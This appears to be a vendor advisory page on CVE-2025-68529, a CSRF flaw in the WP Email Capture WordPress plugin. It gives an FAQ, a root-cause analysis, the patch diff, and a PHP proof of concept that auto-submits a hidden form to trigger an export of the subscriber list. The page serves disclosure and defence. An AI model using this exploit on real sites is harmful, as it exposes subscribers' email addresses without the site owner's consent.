What is CVE-2025-68529?

CVE-2025-68529 is a Cross-Site Request Forgery (CSRF) vulnerability in the WP Email Capture plugin for WordPress, affecting versions up to and including 3.12.5. This vulnerability allows unauthenticated attackers to trick site administrators into performing unauthorized actions, such as exporting email lists.

How does the vulnerability work?

The vulnerability arises from missing nonce validation in the `wp_email_capture_export()` function, which handles email list exports. An attacker can create a malicious webpage that submits a POST request to the WordPress admin interface, triggering the export function without the administrator’s consent.

Who is affected by this vulnerability?

All users of the WP Email Capture plugin version 3.12.5 and earlier are affected by this vulnerability. Administrators who have access to the plugin’s export functionality are particularly at risk if they are tricked into visiting a malicious site.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Email Capture plugin installed. If it is version 3.12.5 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized export actions.

How can I fix or mitigate the issue?

To mitigate this vulnerability, update the WP Email Capture plugin to version 3.12.6 or later, where nonce validation has been properly implemented. Regularly check for updates and apply them promptly to maintain security.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct system access or privilege escalation, it can lead to unauthorized data exports, posing a risk of data breaches.

What is nonce validation and why is it important?

Nonce validation is a security measure used to ensure that requests made to a server are intentional and originate from authenticated users. It helps prevent CSRF attacks by verifying that a unique token is present in the request, confirming user intent.

What are the practical risks of this vulnerability?

The practical risks of this vulnerability include unauthorized access to email subscriber lists, which could be exploited for spam campaigns or phishing attacks. While it does not allow for site compromise, it represents a significant data breach risk.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can create a webpage that automatically submits a form to the vulnerable WordPress admin URL. If an administrator visits this page, their browser will execute the export action without their knowledge, demonstrating the CSRF flaw.

What should I do if I have already been exploited?

If you suspect that your site has been exploited, immediately check your email export logs for unauthorized actions. Change passwords for all administrator accounts, review user access, and consider conducting a full security audit to assess any further risks.

Are there any other security practices to follow?

In addition to updating plugins, implement security best practices such as using strong passwords, enabling two-factor authentication for admin accounts, and regularly backing up site data. Consider using security plugins to monitor for vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2025-68529 can be found in the official CVE database and through security advisories from reputable sources. Additionally, follow WordPress security blogs and forums for updates on vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68529: Email Capture <= 3.12.5 – Cross-Site Request Forgery (wp-email-capture)

CVE ID CVE-2025-68529

Plugin wp-email-capture

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 3.12.5

Patched Version 3.12.6

Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-68529:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the WP Email Capture WordPress plugin versions up to and including 3.12.5. The vulnerability affects the plugin’s email list export functionality, allowing attackers to trick administrators into performing unauthorized data exports. The CVSS score of 4.3 reflects a medium severity impact.

Atomic Edge research identifies the root cause as missing nonce validation in the `wp_email_capture_export()` function handler. The vulnerable code in `/wp-email-capture/inc/options.php` at lines 654-657 only checked if the user was logged in and had administrator capabilities before executing the export. The function did not verify the presence or validity of a CSRF token (nonce) associated with the export request. This missing security check allowed any administrator-level request to proceed without confirmation of user intent.

Exploitation requires an attacker to craft a malicious link or form that submits a POST request to the WordPress admin interface. The attack vector targets the plugin’s internal form handler that processes the `wp_email_capture_export` parameter. An attacker would create a webpage containing a hidden form with action set to the target WordPress admin URL and include the parameter `wp_email_capture_export=1`. When an authenticated administrator visits this page, the form automatically submits, triggering the export function without their consent.

The patch adds proper nonce validation in three files. In `/wp-email-capture/inc/dashboard.php` and `/wp-email-capture/inc/options.php`, the code now generates a nonce using `wp_create_nonce(‘wp-email-capture-export-nonce’)` and includes it as a hidden form field named `wp_email_capture_export_nonce`. The critical fix in `/wp-email-capture/inc/options.php` lines 659-665 wraps the export function call with `wp_verify_nonce()` validation. Before the patch, any administrator request executed the export. After the patch, requests must include a valid, recent nonce token matching the specific action.

Successful exploitation allows unauthorized export of the plugin’s entire email subscriber list as a CSV file. While this does not grant direct system access or privilege escalation, it constitutes a data breach of potentially sensitive marketing lists. Attackers could harvest email addresses for spam campaigns or phishing operations. The impact is limited to data exfiltration rather than code execution or site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/wp-email-capture/inc/dashboard.php
+++ b/wp-email-capture/inc/dashboard.php
@@ -8,10 +8,13 @@

 	wp_email_capture_writetable( 3, '<strong>' . __( 'Last Three Members To Join', 'wp-email-capture' ) . '</strong><br/><br/>' );

+	$nonce = wp_create_nonce( 'wp-email-capture-export-nonce' );
+
 	echo '<br/><br/><a name="list"></a><strong>' . __( 'Export', 'wp-email-capture' ) . '</strong>';
 	echo '<form name="wp_email_capture_export" action="' . esc_url( $_SERVER['REQUEST_URI'] ) . '#list" method="post">';
 	echo '<label>' . __( 'Use the button below to export your list as a CSV to use in software such as', 'wp-email-capture' ) . ' <a href="https://www.wpemailcapture.com/recommends/aweber/" title="Email Marketing">Aweber</a>.</label>';
 	echo '<input type="hidden" name="wp_email_capture_export" />';
+	echo '<input type="hidden" name="wp_email_capture_export_nonce" value="' . esc_attr( $nonce ) . '"/>';
 	echo '<div class="submit"><input type="submit" value="' . __( 'Export List', 'wp-email-capture') . '" class="button" /></div>';
 	echo '</form><br/><br/>';

--- a/wp-email-capture/inc/options.php
+++ b/wp-email-capture/inc/options.php
@@ -562,11 +562,14 @@

 	wp_email_capture_writetable();

+	$nonce = wp_create_nonce( 'wp-email-capture-export-nonce' );
+
 	echo '<a name="list"></a><h3>' . __('Export', 'wp-email-capture') . '</h3>
 				<form name="wp_email_capture_export" action="' . esc_url($_SERVER['REQUEST_URI']) . '#list" method="post">

 					<label>' . __('Use the button below to export your list as a CSV to use in software such as <a href="https://www.wpemailcapture.com/recommends/aweber" title="Email Marketing">Aweber</a> or <a href="https://www.wpemailcapture.com/recommends/constant-contact/">Constant Contact</a>', 'wp-email-capture') . '</label>
 					<input type="hidden" name="wp_email_capture_export" />
+					<input type="hidden" name="wp_email_capture_export_nonce" value="' . esc_attr( $nonce ) . '"/>
 					<div class="submit">
 						<input type="submit" value="' . __('Export List', 'wp-email-capture') . '" class="button"  />
 					</div>
@@ -654,7 +657,13 @@

 		if (is_user_logged_in() ) {
 			if ( current_user_can('administrator') ) {
-				wp_email_capture_export();
+
+				$verify = wp_verify_nonce( $_REQUEST['wp_email_capture_export_nonce'], 'wp-email-capture-export-nonce' );
+				if ( $verify ) {
+					wp_email_capture_export();
+				} else {
+					wp_die( "Unable to download, security check failed." );
+				}
 			} else {
 				wp_die( "Admin's Only Please" );
 			}
--- a/wp-email-capture/wp-email-capture.php
+++ b/wp-email-capture/wp-email-capture.php
@@ -4,7 +4,7 @@
 Plugin Name: WP Email Capture
 Plugin URI: https://www.wpemailcapture.com/?utm_source=plugin-link&utm_medium=plugin&utm_campaign=wpemailcapture
 Description: Captures email addresses for insertion into software such as <a href="https://www.wpemailcapture.com/recommends/aweber" title="Email Marketing">Aweber</a>, <a href="https://www.wpemailcapture.com/recommends/constant-contact/">Constant Contact</a> or <a href="https://www.wpemailcapture.com/recommends/mailchimp/">Mailchimp</a>
-Version: 3.12.5
+Version: 3.12.6
 Author: Winwar Media
 Author URI: https://www.winwar.co.uk/?utm_source=author-link&utm_medium=plugin&utm_campaign=wpemailcapture
 License: GPL2
@@ -21,7 +21,7 @@
 define( 'WP_EMAIL_CAPTURE_URL', plugins_url( '', __FILE__ ) );
 define( 'WP_EMAIL_CAPTURE_TEMP_MEMBERS_TABLE', $wpdb->prefix . 'wp_email_capture_temp_members' );
 define( 'WP_EMAIL_CAPTURE_REGISTERED_MEMBERS_TABLE', $wpdb->prefix . 'wp_email_capture_registered_members' );
-define( 'WP_EMAIL_CAPTURE_VERSION', '3.12.5' );
+define( 'WP_EMAIL_CAPTURE_VERSION', '3.12.6' );
 define( 'WP_EMAIL_MIN_MYSQL_VERSION', '5.6' );

 require_once WP_EMAIL_CAPTURE_PATH . '/inc/core.php';

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68529 - Email Capture <= 3.12.5 - Cross-Site Request Forgery
<?php

// Configuration
$target_url = 'https://vulnerable-site.com/wp-admin/admin.php?page=wp-email-capture%2Finc%2Foptions.php';
// Note: The exact admin page URL may vary based on WordPress configuration.
// The export functionality is triggered via POST to the plugin's options page.

// This PoC simulates an attacker's malicious page that tricks an admin into CSRF.
// In a real attack, this would be hosted on an attacker-controlled domain.
echo '<html><body>';
echo '<h2>CSRF PoC for WP Email Capture Export</h2>';
echo '<p>This page contains a hidden form that automatically submits to the target WordPress admin panel.</p>';
echo '<p>If a logged-in administrator visits this page, their browser will export the email list.</p>';

// Create the auto-submitting form
echo '<form id="csrf_form" method="POST" action="' . htmlspecialchars($target_url) . '">';
// The vulnerable parameter that triggers the export
echo '<input type="hidden" name="wp_email_capture_export" value="1" />';
// Note: The vulnerable version does not require a nonce parameter.
echo '</form>';
echo '<script>document.getElementById("csrf_form").submit();</script>';
echo '</body></html>';

// Alternative method using cURL for direct testing (requires admin cookies):
/*
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['wp_email_capture_export' => '1']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// You would need to add the administrator's cookies via CURLOPT_COOKIE here.
$response = curl_exec($ch);
curl_close($ch);
echo $response;
*/

?>

Frequently Asked Questions

What is CVE-2025-68529?
Overview of the vulnerability
CVE-2025-68529 is a Cross-Site Request Forgery (CSRF) vulnerability in the WP Email Capture plugin for WordPress, affecting versions up to and including 3.12.5. This vulnerability allows unauthenticated attackers to trick site administrators into performing unauthorized actions, such as exporting email lists.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the `wp_email_capture_export()` function, which handles email list exports. An attacker can create a malicious webpage that submits a POST request to the WordPress admin interface, triggering the export function without the administrator’s consent.
Who is affected by this vulnerability?
Identifying impacted users
All users of the WP Email Capture plugin version 3.12.5 and earlier are affected by this vulnerability. Administrators who have access to the plugin’s export functionality are particularly at risk if they are tricked into visiting a malicious site.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WP Email Capture plugin installed. If it is version 3.12.5 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized export actions.
How can I fix or mitigate the issue?
Recommended actions
To mitigate this vulnerability, update the WP Email Capture plugin to version 3.12.6 or later, where nonce validation has been properly implemented. Regularly check for updates and apply them promptly to maintain security.
What does the CVSS score of 4.3 indicate?
Understanding severity levels
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct system access or privilege escalation, it can lead to unauthorized data exports, posing a risk of data breaches.
What is nonce validation and why is it important?
Security mechanism explanation
Nonce validation is a security measure used to ensure that requests made to a server are intentional and originate from authenticated users. It helps prevent CSRF attacks by verifying that a unique token is present in the request, confirming user intent.
What are the practical risks of this vulnerability?
Potential consequences
The practical risks of this vulnerability include unauthorized access to email subscriber lists, which could be exploited for spam campaigns or phishing attacks. While it does not allow for site compromise, it represents a significant data breach risk.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept illustrates how an attacker can create a webpage that automatically submits a form to the vulnerable WordPress admin URL. If an administrator visits this page, their browser will execute the export action without their knowledge, demonstrating the CSRF flaw.
What should I do if I have already been exploited?
Response to exploitation
If you suspect that your site has been exploited, immediately check your email export logs for unauthorized actions. Change passwords for all administrator accounts, review user access, and consider conducting a full security audit to assess any further risks.
Are there any other security practices to follow?
General security recommendations
In addition to updating plugins, implement security best practices such as using strong passwords, enabling two-factor authentication for admin accounts, and regularly backing up site data. Consider using security plugins to monitor for vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-68529 can be found in the official CVE database and through security advisories from reputable sources. Additionally, follow WordPress security blogs and forums for updates on vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations